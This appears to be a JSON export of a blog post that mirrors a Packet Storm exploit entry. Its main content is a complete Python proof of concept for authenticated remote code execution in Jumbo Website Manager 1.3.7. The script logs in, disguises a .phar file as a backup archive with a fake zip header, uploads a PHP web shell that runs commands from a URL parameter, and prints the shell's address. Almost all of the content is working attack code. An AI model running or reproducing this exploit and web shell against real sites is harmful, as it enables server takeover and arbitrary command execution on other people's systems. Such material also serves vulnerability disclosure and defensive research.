{“lastseen”:”2026-04-10T17:16:52″,”description”:”Proof of concept exploit that demonstrates a remote shell upload vulnerability in Jumbo Website Manage version 1.3.7…”,”published”:”2026-04-10T00:00:00″,”modified”:”2026-04-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Jumbo Website Manager Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:218659″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”#Exploit Title: Jumbo Website Manager – Remote Code Execution \\n #Application: Jumbo Website Manager\\n #Version: v1.3.7\\n #Bugs: RCE\\n #Technology: PHP\\n #Vendor URL: https:\/\/sourceforge.net\/projects\/jumbo\/\\n #Software Link: https:\/\/sourceforge.net\/projects\/jumbo\/\\n #Date of found: 28.10.2025\\n #Author: Mirabbas A\u011falarov\\n #Tested on: Linux \\n \\n \\n import requests\\n from typing import Tuple, Optional\\n \\n class JumboCMSExploit:\\n def __init__(self, base_url: str = \\”http:\/\/localhost\\”):\\n self.base_url = base_url\\n self.session = requests.Session()\\n \\n def login(self, username: str, password: str) -\\u003e bool:\\n \\”\\”\\”\\n Login to Jumbo CMS\\n \\n Args:\\n username: Username\\n password: Password (already hashed)\\n \\n Returns:\\n True if login successful, False otherwise\\n \\”\\”\\”\\n print(f\\”[*] Attempting login as: {username}\\”)\\n \\n url = f\\”{self.base_url}\/jumbo_files\/jumbo\/p_login.php\\”\\n \\n headers = {\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (X11; Linux x86_64; rv:144.0) Gecko\/20100101 Firefox\/144.0\\”,\\n \\”Content-Type\\”: \\”application\/x-www-form-urlencoded\\”,\\n \\”Origin\\”: self.base_url,\\n \\”Referer\\”: f\\”{self.base_url}\/jumbo_files\/jumbo\/loginpage.php\\”,\\n }\\n \\n data = {\\n \\”username\\”: username,\\n \\”password\\”: password\\n }\\n \\n response = self.session.post(url, headers=headers, data=data, allow_redirects=False)\\n \\n if response.status_code in [200, 302]:\\n print(f\\”[+] Login successful! Status: {response.status_code}\\”)\\n print(f\\”[+] Cookies: {self.session.cookies.get_dict()}\\”)\\n return True\\n else:\\n print(f\\”[-] Login failed! Status: {response.status_code}\\”)\\n return False\\n \\n def upload_file(self, filename: str, content: bytes) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”\\n Upload a file to the backup manager\\n \\n Args:\\n filename: Name of file to upload (e.g., test.phar)\\n content: Binary content of the file\\n \\n Returns:\\n Tuple of (success, response_text)\\n \\”\\”\\”\\n print(f\\”[*] Uploading file: {filename}\\”)\\n \\n url = f\\”{self.base_url}\/jumbo_files\/jumbo\/backupmanager\/fileupload\/php.php\\”\\n \\n params = {\\”qqfile\\”: filename}\\n \\n # Disguise .phar as .jbox\\n display_name = filename.replace(‘.phar’, ‘.jbox’)\\n \\n headers = {\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (X11; Linux x86_64; rv:144.0) Gecko\/20100101 Firefox\/144.0\\”,\\n \\”Accept\\”: \\”*\/*\\”,\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”,\\n \\”X-File-Name\\”: display_name,\\n \\”Content-Type\\”: \\”application\/octet-stream\\”,\\n \\”Origin\\”: self.base_url,\\n \\”Referer\\”: f\\”{self.base_url}\/jumbo_files\/jumbo\/backupmanager\/loadbackup.php\\”,\\n }\\n \\n response = self.session.post(url, params=params, headers=headers, data=content)\\n \\n if response.status_code == 200:\\n print(f\\”[+] Upload successful!\\”)\\n print(f\\”[+] Response: {response.text}\\”)\\n return True, response.text\\n else:\\n print(f\\”[-] Upload failed! Status: {response.status_code}\\”)\\n return False, response.text\\n \\n def exploit(self, username: str, password: str, filename: str, php_code: str) -\\u003e bool:\\n \\”\\”\\”\\n Complete exploit: Login + Upload\\n \\n Args:\\n username: Login username\\n password: Login password (hashed)\\n filename: Filename to upload\\n php_code: PHP code to execute\\n \\n Returns:\\n True if exploit successful\\n \\”\\”\\”\\n # Step 1: Login\\n if not self.login(username, password):\\n print(\\”[-] Exploit failed at login stage\\”)\\n return False\\n \\n # Step 2: Create malicious file content\\n # PK header to disguise as archive\\n file_content = b’PK\\\\x03\\\\x04\\\\x0a\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00′ + php_code.encode()\\n \\n # Step 3: Upload\\n success, response = self.upload_file(filename, file_content)\\n \\n if success:\\n print(\\”\\\\n[+] Exploit completed successfully!\\”)\\n uploaded_path = f\\”{self.base_url}\/jumbo_files\/jumbo\/backupmanager\/fileupload\/uploads\/backup.phar?cmd=whoami\\”\\n print(f\\”[+] File possibly uploaded to: {uploaded_path}\\”)\\n return True\\n else:\\n print(\\”[-] Exploit failed at upload stage\\”)\\n return False\\n \\n \\n if __name__ == \\”__main__\\”:\\n print(\\”=\\”*70)\\n print(\\”Jumbo CMS Authenticated RCE via File Upload Exploit\\”)\\n print(\\”=\\”*70)\\n print()\\n \\n # Configuration\\n TARGET = \\”http:\/\/localhost\\”\\n USERNAME = \\”admin\\”\\n PASSWORD = \\”6f7303f028531527b2da3620ccaf25ee384ae7db\\” \\n FILENAME = \\”test123.phar\\”\\n PHP_CODE = ‘\\u003c?php echo system($_GET[\\”cmd\\”]);?\\u003e’\\n \\n # Run exploit\\n exploit = JumboCMSExploit(TARGET)\\n exploit.exploit(USERNAME, PASSWORD, FILENAME, PHP_CODE)”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218659″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218659\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-10T17:16:52″,”description”:”Proof of concept exploit that demonstrates a remote shell upload vulnerability in Jumbo Website Manage version 1.3.7…”,”published”:”2026-04-10T00:00:00″,”modified”:”2026-04-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Jumbo Website Manager Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:218659″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”#Exploit Title: Jumbo Website…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-42356","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n